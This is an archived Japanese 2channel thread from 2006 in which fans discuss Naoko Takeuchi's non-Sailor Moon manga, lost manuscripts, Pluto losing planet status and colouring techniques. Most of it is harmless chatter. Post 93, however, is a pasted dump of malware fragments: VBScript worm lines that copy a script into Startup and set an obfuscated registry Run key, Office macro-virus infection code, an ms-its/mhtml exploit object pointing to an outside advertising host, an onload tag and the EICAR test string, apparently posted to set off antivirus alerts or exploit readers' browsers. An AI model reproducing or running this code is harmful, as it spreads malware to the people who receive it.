2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

★*・゚゚・*:。:*・゚☆武内直子 27★゚・*:。:*・゚゚・*★

1 :セラムン話はセラムンスレへ:2006/08/02(水) 07:15:17 ID:zkEJ5yuS0
「そのもの」にして宇宙人の姫とその作品を語ろう。

※ このスレはセーラームーン*以外*の話題のスレです。
  セーラームーンに関する話題はセラムンスレでお願いします。
  

ガイドライン他は>>2-5

2 :セラムン話はセラムンスレへ:2006/08/02(水) 07:18:07 ID:???0
美少女戦士セーラームーン
http://comic6.2ch.net/test/read.cgi/rcomic/1147389761/

3 :セラムン話はセラムンスレへ:2006/08/02(水) 07:20:04 ID:???0
<公式サイト・セーラームーンチャンネル>
ttp://sailormoon.channel.or.jp/

●FAQ
Q:パーソナルデータは?
A:本名同じ。1967年3月15日。血液型A。山梨県甲府市出身。
  共立薬科大卒。薬剤師、臨床検査技師資格有。
  夫・「ハンター×ハンター」の冨樫義博氏。
  97年頃から自称「姫」。(冨樫氏は「王子」、息子は「プチ王子」)
  代表作「セーラームーン」(担当編集・小佐野氏。通称おさBu。チェリプロ第二部より担当。既婚。)
  他作品「ま・り・あ」「The チェリー・プロジェクト」他。
  最近作は「とき☆めか!」なかよし05年1月号〜06年5月号で完結。
  現在は、新作待ち。
  画像ttp://kodansha.cplaza.ne.jp/hot/people/2002_05_08/w-anno-message.asx
Q:「PQエンジェルス」「ラブ・ウィッチ」はどうなったの?
A:集英社YOUNGYOU掲載エッセイ(?)マンガ「ばるーん・ぱ〜んち」一回目での情報? によると
  PQエンジェルスが再開しない理由は、編集部が原稿無くしてコミックスを 出せない状態だから。
  また別の情報では…
  無くした原稿はPQじゃなくて設定原画集の原稿計7枚だったはず。
  おもちゃ会社の子会社に回されてるうちにどこかに行ったり
  講談社の引っ越し(?)の際どこかに紛れたりなどで紛失した模様。
  ちなみにYOUNGYOUのおかげか連載一回目直後
  出せなかった設定原画集が急遽発売が再決定。
  02年4月〜6月「ラブ・ウィッチ」連載第3回、以降休載。
  同年9月番外編「シスター・ウイッチ」1話のみ。
  本誌では「連載再開に向けて、準備中!」とだけコメントあり。
  (以上過去スレより抜粋)

4 :セラムン話はセラムンスレへ:2006/08/02(水) 07:21:07 ID:???0
●過去スレ
1 http://comic.2ch.net/gcomic/kako/1016/10166/1016682486.html 2002/03/21〜
2 http://comic.2ch.net/test/read.cgi/gcomic/1043318743/ 2003/01/23〜
3 http://comic.2ch.net/test/read.cgi/gcomic/1057999245/ 2003/07/12〜
4 http://comic.2ch.net/test/read.cgi/gcomic/1066181398/ 2003/10/15〜
5 http://comic.2ch.net/test/read.cgi/gcomic/1069681877/ 2003/11/24〜
6 http://comic.2ch.net/test/read.cgi/gcomic/1071816152/ 2003/12/19〜
7 http://comic.2ch.net/test/read.cgi/gcomic/1074955150/ 2004/01/24〜
8 http://comic.2ch.net/test/read.cgi/gcomic/1076593216/ 2004/02/12〜
9 http://comic.2ch.net/test/read.cgi/gcomic/1078178744/ 2004/03/02〜
10 http://comic2.2ch.net/test/read.cgi/gcomic/1078928520/ 2004/03/10〜
11 http://comic2.2ch.net/test/read.cgi/gcomic/1080351661/ 2004/03/27〜
12 http://comic4.2ch.net/test/read.cgi/gcomic/1081699649/ 2004/04/12〜
13 http://comic4.2ch.net/test/read.cgi/gcomic/1083857926/ 2004/05/07〜
14 http://comic6.2ch.net/test/read.cgi/gcomic/1087146481/ 2004/06/14〜
15 http://comic6.2ch.net/test/read.cgi/gcomic/1088870721/ 2004/07/04〜

5 :セラムン話はセラムンスレへ:2006/08/02(水) 07:22:27 ID:???0
16 http://comic6.2ch.net/test/read.cgi/gcomic/1090602461/ 2004/07/24〜
17 http://comic6.2ch.net/test/read.cgi/gcomic/1092317537/ 2004/08/12〜
18 http://comic6.2ch.net/test/read.cgi/gcomic/1093940533/ 2004/08/31〜
19 http://comic6.2ch.net/test/read.cgi/gcomic/1095465875/ 2004/09/18〜
20 http://comic6.2ch.net/test/read.cgi/gcomic/1096728286/ 2004/10/02〜
21 http://comic6.2ch.net/test/read.cgi/gcomic/1100953599/ 2004/11/20〜
22 http://comic6.2ch.net/test/read.cgi/gcomic/1108880440/ 2005/02/20〜
23 http://comic6.2ch.net/test/read.cgi/gcomic/1123534165/ 2005/08/09〜
24 http://comic6.2ch.net/test/read.cgi/gcomic/1133944192/ 2005/12/07〜
25 http://comic6.2ch.net/test/read.cgi/gcomic/1140375553/ 2006/02/20〜
26 http://comic6.2ch.net/test/read.cgi/gcomic/1142414517/ 2006/03/15〜

6 :花と名無しさん:2006/08/02(水) 12:23:25 ID:???0
保育園のとき、
セーラームーンごっこしたなあ。

7 :花と名無しさん:2006/08/03(木) 11:11:12 ID:???O
>>1
乙華麗です。

8 :花と名無しさん:2006/08/03(木) 23:01:03 ID:???0
>>1
O2

9 :花と名無しさん:2006/08/05(土) 12:43:32 ID:???O
おつ!

10 :花と名無しさん:2006/08/05(土) 14:27:56 ID:???0
勃!

11 :花と名無しさん:2006/08/05(土) 15:00:54 ID:???0
前スレは埋まらないまま落ちたか。


12 :花と名無しさん:2006/08/06(日) 02:23:01 ID:???0
保守

13 :花と名無しさん:2006/08/07(月) 11:02:04 ID:???O
そろそろコミクスとか、新連載とか何か出ないかな…。
昔のアンニュイな感じの漫画希望。

14 :花と名無しさん:2006/08/08(火) 22:47:43 ID:???0
精神状態が作品に出やすい人のようだからね。
舞い上がったら、舞い上がったような内容しか描けないでしょう。

15 :花と名無しさん:2006/08/09(水) 13:40:06 ID:???O
そうだね。
もう昔みたいな漫画は描けないのかな…。
久しぶりにアナログカラーも見てみたいな。


16 :花と名無しさん:2006/08/09(水) 23:27:51 ID:???O
PQエンジェルスって、ゴキブリをモチーフにつかって、苦情がでたから無くなったと思ってた…

17 :花と名無しさん:2006/08/11(金) 09:51:31 ID:???O
そういえばゴキブリだったか…(´Д`)
当時は何とも思わなかったけどよく考えたらゴキブリ嫌だな…。


18 :花と名無しさん:2006/08/11(金) 11:39:29 ID:zL2YDBzGO
age

19 :花と名無しさん:2006/08/11(金) 18:41:13 ID:???0
ゴキブリが凝人化って・・・
今思えば確かにアレかも知れない
ずっとキレイな変身ものの少女漫画かいてたからかな?

20 :花と名無しさん:2006/08/12(土) 14:11:16 ID:???0
セラムンでも腐乱死体書いてたじゃん。

21 :花と名無しさん:2006/08/15(火) 15:47:58 ID:???0
そんなのあったか?

22 :花と名無しさん:2006/08/16(水) 17:23:13 ID:???0
ときめかの2巻はいつになったら出るんだろう

23 :花と名無しさん:2006/08/16(水) 23:03:38 ID:???0
太陽系惑星が12に増えたよ。
セーラーゼナカッコ良さそうwww

24 :花と名無しさん:2006/08/16(水) 23:57:30 ID:???0
いいね!

25 :花と名無しさん:2006/08/17(木) 21:44:32 ID:???0
やたら増やすような愚行は2度とするべからず。

26 :花と名無しさん:2006/08/17(木) 22:19:07 ID:VcFNrTIV0
>>23
新聞に載ってて吹いたw


27 :花と名無しさん:2006/08/18(金) 04:31:50 ID:???0
ゼナってアメリカのギリシア神話ネタのテレビドラマの主人公の名前で
神話には出てこない完全にオリジナルキャラだぞ。
だから正式名称には採用されない公算だ。

原作ファンに質問。今回のことで増えるセーラー戦士の数は何人か。

28 :セラムン話はセラムンスレへ:2006/08/18(金) 08:28:59 ID:???0
美少女戦士セーラームーン
http://comic6.2ch.net/test/read.cgi/rcomic/1147389761/

29 :花と名無しさん:2006/08/18(金) 16:47:48 ID:???0
太陽系12惑星 新定義「自己重力で球形」提案 候補さらに12個
http://headlines.yahoo.co.jp/hl?a=20060817-00000000-san-soci
もっと増えそうです 

30 :花と名無しさん:2006/08/19(土) 02:09:34 ID:???0
試験で困るので、今まで通りでいいです。

31 :花と名無しさん:2006/08/19(土) 05:56:42 ID:???0
24惑星になるのか。

32 :花と名無しさん:2006/08/23(水) 02:55:37 ID:???0
セーラーサンとセーラーアースはまだですか?

33 :花と名無しさん:2006/08/23(水) 15:34:04 ID:???0
太陽系惑星、今度は8個(共同通信)
http://newsflash.nifty.com/news/ts/ts__kyodo_20060823ts024.htm

34 :花と名無しさん:2006/08/23(水) 21:54:15 ID:???0
星占いはどうなるんだよ?

35 :花と名無しさん:2006/08/24(木) 00:46:12 ID:???0
セーラー戦士が一人減るwww

36 :花と名無しさん:2006/08/24(木) 01:00:48 ID:???0
まあ、一人くらい減った方がいいかもな。

37 :花と名無しさん:2006/08/24(木) 17:12:29 ID:???0
冥王せつない・・・

38 :花と名無しさん:2006/08/24(木) 23:59:44 ID:???0
冥王星消えたね
プルートー!!!

39 :花と名無しさん:2006/08/25(金) 00:43:54 ID:???0
世界星座学会とかで決定

つーか冥王星自体わずか数十年前に発見されたって
それで占いに組み込む占い師たちも適当だし、
数万年前の前世とかの生まれ変わりとか有り得ないですから
なによセーラーブルートって
あのくらいの大きさの星って太陽系に沢山あるんだってね
その守護聖人たちはどうしてるのさ

おわったね、セーラームーン。

40 :花と名無しさん:2006/08/25(金) 01:57:39 ID:???O
プルート好きだったのになぁ…なんか寂しい(´〜`)

41 :花と名無しさん:2006/08/25(金) 02:00:34 ID:???0
公式で姫に何かコメントしてほしいね
プルートのイラスト付きで

42 :花と名無しさん:2006/08/25(金) 13:30:34 ID:???0
  |         |  |____ せつなタソ…i三 ∪
  |         |  | ̄ ̄ ̄ /|       三 |    何を胸に生きたらいいんだ・・・
  |         |  |   / /|      (/~∪         _, ,_
  |        /\ |  /|/|/|     三三        /⌒ヽ)
  |      /  / |// / /|    三三         i三 ∪
  |   /  / |_|/|/|/|/|   三三          .三 |
  |  /  /  |冥|/ // /                (/~∪
  |/  /.  _.| ̄|/|/|/   トボトボ…        三三
/|\/  / /  |/ /                 三三
/|    / /  /ヽ            _, ,_
  |   | ̄|  | |ヽ/l          /⌒ヽ)
  |   |  |/| |__|/          i三 ∪  俺達の太陽系は
  |   |/|  |/            .三 |        終わった・・・
  |   |  |/   プルート…     .(/~∪
  |   |/     _, ,_        三三
  |  /     /⌒ヽ)       三三
  |/      i三 ∪     三三
/        三 |               _, ,_  
         (/~∪             /⌒ヽ)  俺たちは忘れないぞ…
         三三             i三 ∪


43 :花と名無しさん:2006/08/25(金) 14:39:59 ID:???0
「セーラームーン」という作品は「太陽系が9つあるとされた時代」の遺物となった。

1930年から2006年という、天文学の歴史の中に封印されたのだ。

44 :花と名無しさん:2006/08/25(金) 14:41:31 ID:???0
失礼。「太陽系に惑星が9つあるとされた時代」だな。

45 :花と名無しさん:2006/08/25(金) 15:39:33 ID:???0
てかプルートなんておばはんどうでもいい
土萌さんがいればそれでいい

46 :花と名無しさん:2006/08/25(金) 15:41:21 ID:???0
初心にかえって、最初の5人に戻れということだ。

47 :花と名無しさん:2006/08/25(金) 17:23:25 ID:???0
内部と銀河系だけでおK。

48 :花と名無しさん:2006/08/25(金) 17:23:46 ID:???0
セーラームーンの人気投票でせつなさんを1位にしようぜ!
http://vote2.ziyu.net/html/vipmoon.html

ここにセーラージュウシマツってのがいたんだけどwwそんなんいたっけ?

49 :48:2006/08/25(金) 18:12:47 ID:???0
ごめん、ググったらわかった。スルーしてorz

50 :花と名無しさん:2006/08/25(金) 21:40:06 ID:???0
>>48アウトー!!!

     ■
    ○丿ミ
   /|─■て
  ._|-┐._| ̄|○
     パーン

…ってこのネタは完璧にスレ違いだろ。すみません…

51 :花と名無しさん:2006/08/25(金) 21:40:45 ID:???0
>>47
後半イラネ

52 :花と名無しさん:2006/08/26(土) 01:02:52 ID:Q+odgv5OO
天、海王星だけは外せない…


53 :花と名無しさん:2006/08/26(土) 02:14:49 ID:???0
時どきでいいから、デズニーのプルートのことも思い出してください・・・。

つーか、こっちの方が先だしな。

54 :花と名無しさん:2006/08/26(土) 07:59:04 ID:???0
デズニー見てないもん。

55 :花と名無しさん:2006/08/27(日) 16:44:22 ID:???0
ディステニーじゃないぞ。

56 :花と名無しさん:2006/08/27(日) 19:53:13 ID:???0
>>53
でもこの前死んだよね。アメリカのネズミ王国で。

57 :花と名無しさん:2006/08/29(火) 00:17:59 ID:???0
プルートが死んだって
着ぐるみが燃えてしまったとか中の人が交通事故で他界したとか
そういうことですか?

58 :花と名無しさん:2006/08/31(木) 21:03:33 ID:???0
>57
冥王星が惑星じゃなくなったんだよ
ニュース見てない?

って釣りだったらごめんね

59 :花と名無しさん:2006/09/01(金) 17:15:57 ID:???0
>>58
57は>>56のレスに対しての疑問なんだと思うが・・・

もうどっちでもいいや

60 :花と名無しさん:2006/09/01(金) 17:50:46 ID:qclwdbJKO
ハンター×ハンターの続き読みたい

61 :花と名無しさん:2006/09/01(金) 20:46:17 ID:???0
あ そ

62 :花と名無しさん:2006/09/01(金) 21:11:56 ID:???0
ときめかなんか連載しなくてよかったから
(トーンばっかりでハイテンションすぎて目がチカチカした)
ラブウィッチを連載再開して欲しい

やっぱりシュガルンとかぶったせいか
それなら一時期どれみとラブウィッチがかぶってたけど

63 :花と名無しさん:2006/09/02(土) 00:01:49 ID:???0
姫は今漫画じゃなくてセラムンHPの改装に力入れちゃってるのかしらー…。

64 :花と名無しさん:2006/09/02(土) 00:55:52 ID:???0
あれも他の人がやってそう。
姫はもうやる気なくって食っちゃね・・・

65 :花と名無しさん:2006/09/02(土) 01:27:53 ID:???0
プルート降格とともに、R以降はなかったことにしましょう。先生。

66 :花と名無しさん:2006/09/02(土) 03:11:08 ID:???0
Rなんて原作にはもともとないよ

67 :花と名無しさん:2006/09/02(土) 07:55:33 ID:???0
漏れも第2部以降はいらないなあ。

68 :花と名無しさん:2006/09/03(日) 00:54:37 ID:???0
アニメはS最強
外部太陽系三戦士がなけりゃセラムンじゃないでしょ。
ssから全ての間違いは始まった

69 :花と名無しさん:2006/09/03(日) 01:25:40 ID:???0
>>68
いや、いなくたってセラムンだよ。きっぱり。

70 :花と名無しさん:2006/09/03(日) 01:51:00 ID:???0
アニメなんかどうでもいいよ

71 :花と名無しさん:2006/09/03(日) 10:32:16 ID:???0
つうかセラムンはいいよ

72 :花と名無しさん:2006/09/03(日) 10:37:19 ID:???0
もうゆっくり眠らせてやってくれ、セラムンを。

73 :花と名無しさん:2006/09/04(月) 02:34:12 ID:NjJ8CYfm0
姫って言うぐらいだから期待しちゃった!王子って言うぐらいだから期待しちゃった!

Jrには到底期待できない・・・

74 :花と名無しさん:2006/09/04(月) 06:22:14 ID:WuM6mWfVO
ちびうさなんて、いらない。
ゆめゆめしいのが子供の登場で現実的になって
萎えたなぁ。あれ初萎えだ
パパにベタベタとかキモス

75 :花と名無しさん:2006/09/04(月) 09:06:58 ID:???0
そんなあなたにアニメ版。
ちびうさ消滅、婚約解消。
自由な未来が彼女たちに!

76 :花と名無しさん:2006/09/04(月) 10:46:35 ID:???0
アニメの話をどうしても持ち込みたい厨はきえろ。
大体今ここはセラムンの話はスレ違いだ。

77 :花と名無しさん:2006/09/04(月) 19:59:34 ID:???0
ファンからもセラムンは武内作品ではない認定?

78 :花と名無しさん:2006/09/04(月) 21:02:26 ID:???0
>>1くらい読めよ

79 :花と名無しさん:2006/09/04(月) 22:01:40 ID:???0
正しくは
キャラデザ原案:武内直子

80 :花と名無しさん:2006/09/05(火) 01:54:23 ID:???0
アンチはアンチなりの節度を守れよ

81 :花と名無しさん:2006/09/05(火) 04:28:15 ID:???0
>>79
アンチはいつまでそのデマひっぱるつもりだ。

82 :花と名無しさん:2006/09/05(火) 09:47:48 ID:???0
相変わらず>>79みたいなネタには、飽きずに食いつくな。
そろそろスルーを覚えてもいい頃だが・・・。

83 :花と名無しさん:2006/09/05(火) 09:57:48 ID:???0
つられてるんでも食いついてるんでもない。

過去10年を振り返って、そのデマはその都度クギを刺しておかないと
一人歩きするという経験からやむなくやってるだけだ。

84 :花と名無しさん:2006/09/05(火) 10:51:59 ID:???0
テンプレにでも入れておけば…どうせ今更セラムン話題にならないし
デマもその個人だけで広がりようがない気が

85 :花と名無しさん:2006/09/05(火) 11:32:51 ID:???0
>>83
思いっきり釣られて食いついてるやん。

こんな辺境のスレで、どこの誰かもわからん書き込みに、どこの誰かもわからん奴が
釘さしてどうなるっちゅーの。
その手の話なくなるわけもない。
過去十年振り返って、「ムダだった」ってわかるやろーに。

この手の話が出なくなるのは、セーラームーンが完全に忘れ去られる時だが、
後10年はありえんだろうな。

86 :花と名無しさん:2006/09/05(火) 11:34:06 ID:???0
大体、どう見ても>>79は釣り。


87 :花と名無しさん:2006/09/05(火) 13:56:38 ID:???0
つられてるんでも食いついてるんでもない

 ̄ ̄\| ̄ ̄ ̄ ̄ ̄ ̄
   /     \     
  /   / \ \                 /  ̄   ̄ \
 |    (゚) (゚)   |               /、          ヽ はぁ?空気嫁  
 |     )●(  |               |・ |―-、       |
 \    ▽   ノ              q -´ 二 ヽ      |
   \_    /                ノ_ ー  |     |
.  /   ̄ ̄\                \. ̄`  |      /  


88 :花と名無しさん:2006/09/05(火) 18:12:16 ID:???0
そうだね、ドラちゃん。

89 :☆キャッピー☆ ◆DO6ixkT1H2 :2006/09/07(木) 05:44:35 ID:???0
>>87
きゃあーーこの顔ウケル〜〜www

バーーーニングーーーマンダラーーーーー!!!!!

90 :花と名無しさん:2006/09/07(木) 22:57:09 ID:???0
最近スケート漫画読んだけど、似たような構図セラムンでも
結構あるのな。

91 :花と名無しさん:2006/09/07(木) 23:40:01 ID:Nmmr7I0/0
1997年9月号の講談社の雑誌「るんるん」
(るんるんは創刊時は隔月でしたが、このときは月刊になってました)、で「セーラーV次号いよいよ最終回」と宣伝してたのに10月号は説明も無くいきなり不掲載。
11月号になって最終回が載ったのはなぜですか。竹内直子原稿紛失事件ってこれのことですか。
(どっちが無くしたの?)講談社ともめて集英社に移ったそうだけど。

92 :花と名無しさん:2006/09/09(土) 00:08:54 ID:???0
原稿紛失はPQだろ。それと設定資料集発刊でもめたのが講談社離れの理由。

93 :<body onload=window()>:2006/09/09(土) 01:42:40 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

94 :花と名無しさん:2006/09/09(土) 20:49:43 ID:???0
設定資料集再販してくれないかなー

95 :花と名無しさん:2006/09/16(土) 01:00:02 ID:wpL536aZO
直子さんが結婚生活をマンガにしたものって単行本になってるんですか?

96 :花と名無しさん:2006/09/16(土) 02:46:42 ID:???0
なってません

なってほしい

97 :花と名無しさん:2006/09/16(土) 03:54:13 ID:???O
PQ自分が小学生のときに途中で終わったから、ずーっと気になってたんだよね。
ここ見て7年経ってやっと分かった!

チラ裏スマソ。

98 :花と名無しさん:2006/09/20(水) 02:54:54 ID:???O
原稿紛失でも書き直したりはできそうなのに

99 :花と名無しさん:2006/09/21(木) 01:03:41 ID:???0
根性ないんだよ。

100 :『超こち亀』本に ??:2006/09/22(金) 02:46:07 ID:???0
『超こち亀』本にセラムン・キャラの登場はあったのか??

http://www.j-kochikame.com/
http://www.amazon.co.jp/gp/product/4088740963

記念本『超こち亀』が発売!!
 発売日:9月15日(通常発売)
 価格:2,100円
漫画界のビッグネームたちとのコラボ漫画が実現!
 さいとう・たかを先生[ゴルゴ13]
 モンキー・パンチ先生[ルパン三世]
 ゆでたまご先生[キン肉マン]
 鳥山明先生[ドラゴンボール]
その他、WJ連載中のギャグ漫画4タイトルとの大連合合作も!!
スペシャル対談も収録!!
そして、永久保存版CD-ROM『デジ亀』付!!
 30年分のデータをこの1枚に凝縮!!

ΨΨΨΨΨΨΨΨΨΨΨΨΨΨΨΨΨΨΨΨΨΨΨΨΨΨΨΨΨΨΨΨΨΨΨΨ
王子は参加しているぞ!
姫との御成婚についてのコメントあり!

そして 想定内の あのキャラが やはり・・・(^_^;)

マリアな(^_^;) レイさんは出てないやうですね^^



101 :花と名無しさん:2006/09/22(金) 13:08:39 ID:???0
プチ王子のお受験はどうなったの

102 :花と名無しさん:2006/10/04(水) 06:58:08 ID:???0
おい、あれからどうした?


103 :花と名無しさん:2006/10/04(水) 07:53:03 ID:???0
過疎化。

104 :花と名無しさん:2006/10/04(水) 08:03:21 ID:???0
凄い粘着ファンがはりついているから大丈夫でしょ。


105 :花と名無しさん:2006/10/04(水) 21:04:00 ID:???O
>>91
るんるんは元々季刊で途中から隔月刊になったのだが(ちなみに月刊ではない)

106 :花と名無しさん:2006/10/05(木) 21:48:28 ID:???0
この前久々にウインクレインとプリズムタイム1を読んだんだけど、
武内直子ワールドって、今の小中高生には理解できないかもなーと
思った。かなり詩的な感じだよね。

107 :花と名無しさん:2006/10/06(金) 01:18:07 ID:???0
少女漫画はそういうのが多いんですよ。

108 :花と名無しさん:2006/10/06(金) 05:32:39 ID:fOrglSVO0
普通マンガ家はベテランになって行くに従って絵が上手になって行くものなのに、
アシスタントの居ないデビュー作や「チェリプロ」の時までは絵が上手だったのに、
セーラームーンではいきなり絵が下手、雑になり、「PQエンジェルズではもっと下手。
しかもベタも入れないで画面真っ白けになったのはなぜですか?
でも「PQエンジェルズ」は好き。

109 :花と名無しさん:2006/10/06(金) 18:24:25 ID:???0
ピークが早かっただけ
上手い人でも徐々にバランスが崩れて奇形化する人もいる

110 :花と名無しさん:2006/10/06(金) 20:57:24 ID:fOrglSVO0
他の「セーラームーン」スレはろくな所がないので、このスレでもセラムンの話題をやって欲しい。

111 :花と名無しさん:2006/10/06(金) 21:31:12 ID:???0
断る

112 :花と名無しさん:2006/10/06(金) 23:12:28 ID:lHxUD6G70
私の想像だと「PQエンジェルズ」が絵が下手で雑で、しかもベタも無かったのは、
セーラームーンが終了してアシスタントが居なくなり、人気におぼれて絵を手抜きしてベタも入れなかったからと思うんだけど、
真相はどうなんだろ?

113 :花と名無しさん:2006/10/06(金) 23:26:32 ID:???0
セーラームーンで商売的に一番過密な時期を過ごしてしまったからだろう。
成長する前に限界がきてしまった。

>>110
勝手にやれば?

114 :花と名無しさん:2006/10/06(金) 23:49:49 ID:???0
>>112
がゆん達との共同展のパンフにPQ1話のカラーが載ってるけど
「過去最高(最悪)の進行でボロボロでした」って書いてある。
連載も行き当たりばったりとか…
時間がなかったんじゃないか?

115 :花と名無しさん:2006/10/07(土) 00:21:53 ID:3r6rBzBJ0
がゆん達との共同展のパンフに「PQエンジェルズ」1話のカラーが載ってるけど、
と有るけど、そうゆう情報はどの雑誌に載ってるんですか?
どこに行けば売ってるんですか?どうか教えて下さい。
私も欲しい。
私は静岡県なので交通費がかかってめったに東京へ行けないし。




116 :114:2006/10/07(土) 12:05:27 ID:???0
>>115
97年にやった「5人のプロジン・アマジン展」ってイベントのパンフ。
今では入手困難かも。

117 :花と名無しさん:2006/10/07(土) 22:52:46 ID:dvIW4oJJ0
皆さん私の質問に真面目に答えてくれてありがとうございました。
でもまだ合点がいきません。よく人気漫画家は自分で描くのは目だけで、後はキャラも全てアシスト任せと言われているけど武内先生の場合どうなんでしょう?
例えばセーラームーン4巻でビーナスがラブミーチェーンを使う場面があるけど、すごい絵が雑だし。
「PQエンジェルズ」の時は「忙しくて時間がなかった」と言うけど、もうセーラームーンとセーラーVの連載が終わったのだから暇なんじゃないのかな?
なのになんでPQエンジェルズで手抜きするんだろ。ベタも無かったし。
でも「PQエンジェルズ」好きよ。再開して。

118 :花と名無しさん:2006/10/08(日) 08:38:32 ID:???0
ノシ
以前なかよしで連載されていたラブ・ウィッチってどうなったの?

119 :花と名無しさん:2006/10/08(日) 11:19:58 ID:1kR56P4x0
物語の途中でいきなり中止になってしまいました。
そんなに人気無かったのかな?

120 :花と名無しさん:2006/10/08(日) 13:10:42 ID:???0
>>117
真相は直接姫に聞く以外、わかるはずないじゃん。
みんなの回答だって推測だ。
あんたも、自分が納得いく推測すればいいだけ。
「なんで、なんで」って子供じゃないんだからさ。


121 :花と名無しさん:2006/10/08(日) 17:30:57 ID:LT1ytBH50
この欄に武内先生の元アシスタントや元講談社社員、元編集、熱狂的なマニアが居れば
「セーラーV」突然の最終回休載や「PQエンジェルズ」の画力低下の謎が解けるんだけどなあー。
私は真剣です。からかってるわけじゃない。
120さん。あなたは素朴な疑問ってないの?

122 :花と名無しさん:2006/10/08(日) 17:46:20 ID:???0
そういう人はここにいないってことは
簡単に分かると思うんですが
聞く場所間違えてる

123 :花と名無しさん:2006/10/08(日) 18:18:03 ID:???0
いたとしたって、普通、こんな所で裏話暴露するようなアホは
いくら何でも武内直子の周囲にいないだろ。
>>121は、会社に就職したら、2ちゃんに会社の裏話流すような
アホなんだろうな。(まだ就職してない子供だと思いたいけど)
真剣な所が救いようがない。それがどういう事かわかってないんだもんな。

っていうか、やっぱただの荒しかもね。



124 :花と名無しさん:2006/10/08(日) 18:18:31 ID:???0
いきなり上り詰めてしまった後は
何を描けばいいのかわからなくなったような
迷走ぶりを感じさせるんだよな。
ある意味気の毒な漫画家だ。

125 :花と名無しさん:2006/10/08(日) 20:29:47 ID:???0
ルナの黒ベタをちゃんと縁まで塗って欲しい

126 :花と名無しさん:2006/10/08(日) 20:59:35 ID:1kR56P4x0
私は「セーラーV」最終回の突然休載、「PQエンジェルズ」の絵柄低下について質問した者です。
120さんの「皆の回答だって推測だ」にショックを受けて、つい「もっと詳しい人が居たらなあ」と愚痴ってしまった。
せっかく質問に答えてくれた人に不快感を与えたのなら謝ります。ごめんなさい。
でも私、質問魔じゃないよ。118さんの「ラブウイッチ」がどうなったか答えてあげたの私だよ。
それなのに荒らし扱いするなんてひどいなあ。

127 :花と名無しさん:2006/10/08(日) 21:35:26 ID:???0
わー荒らしがいるよ

128 :花と名無しさん:2006/10/08(日) 22:57:48 ID:???0
きゃー、こわ〜い

129 :花と名無しさん :2006/10/08(日) 23:12:20 ID:???0
>>128
黒木ミオのモノマネかそれは

130 :花と名無しさん:2006/10/09(月) 10:48:19 ID:???0
荒らし、いやーん

131 :花と名無しさん:2006/10/10(火) 11:28:21 ID:???O
PQって1話だけやったやつだっけ?
だとしたら絵はともかく面白かった印象がある。
何でここで休載!?連載決まるまで掲載すんなよ!と思った。
セラムンアニメから入ったから絵にびっくりしたけどさw

132 :花と名無しさん:2006/10/10(火) 21:36:52 ID:???0
一瞬、DQに見えた

133 :花と名無しさん:2006/10/15(日) 12:38:47 ID:???O
>>131
PQは4話までやったよ

134 :花と名無しさん:2006/10/21(土) 08:56:26 ID:???0
DQNジェルズ

なるほど。

135 :花と名無しさん:2006/10/26(木) 06:12:36 ID:???0
PQは好きだったので掲載号を全部保存してある。
もう9年も前のことなんだね。時の流れって恐ろしい。

136 :花と名無しさん:2006/10/30(月) 01:50:54 ID:???0
そんなになるのか。
ちょこっとセーラームーンの絵を描いてくれてたのがうれしかったあの頃。

137 :花と名無しさん:2006/10/30(月) 17:28:36 ID:???0
age

138 :花と名無しさん:2006/11/01(水) 00:04:30 ID:???0
今更だが、実写また見ちった。
四天王良いのー。
実写の衛は、うさぎばっかりじゃなくて、四天王のためにも
動くのが何ともすてきだ。

139 :花と名無しさん:2006/11/01(水) 00:24:52 ID:???0
>>138
そういうの、一番見たかった要素なんだよなー。
実写にもいろいろ言いたい所もあるが、やっぱり好きだー!

140 :花と名無しさん:2006/11/02(木) 10:01:29 ID:???0
実写版に出ていた役者もそれぞれ名が売れてきた人、消えた人と
明暗分かれてきたねー

141 :花と名無しさん:2006/11/02(木) 22:41:20 ID:???0
そうなのかな?
わりとみんながんばっているという噂は聞くけど。

142 :花と名無しさん:2006/11/03(金) 01:50:30 ID:???0
消えた人って、まだ本当に消えたかわからないよね?

143 :花と名無しさん:2006/11/04(土) 03:30:21 ID:???0
マスターがドラマに出るそうですね。

144 :花と名無しさん:2006/11/04(土) 21:40:27 ID:???O
武内のカラー絵が好きで、真似して塗ってみるけど全然違う…
あの淡くて透明感のある色が出ないorz
武内ってカラーインクだよね?どうすれば近付けるんだろ

145 :花と名無しさん:2006/11/04(土) 21:59:35 ID:???0
混色をなるだけしない
蛍光色を使う
ぼかしを多用する

即座に思いついたのはこんな感じ
すでにやってたらスマソ

146 :花と名無しさん:2006/11/04(土) 22:40:46 ID:???0
ゾイの人がバンド解散したそうだが心配だ。
これからもっと活躍してほしい。

147 :144:2006/11/05(日) 10:45:19 ID:???O
>>145
トンです!うわあ混色してましたよ('A`)
色の種類をそんなに持ってないから余計に…orz
参考にしますねーノシ

148 :花と名無しさん:2006/11/05(日) 19:22:32 ID:???0
>>147
混色をすればするほど彩度が落ちるので
混ぜても二色以下で

日がたつと確実に退色するんだけど
肌に蛍光色を使うと鮮やか
例えば赤と黄色を混ぜて肌色を作っているとしたら
蛍光ピンクと黄色にするとか
赤はにごりやすい色なので、使いかたを間違えると濁る

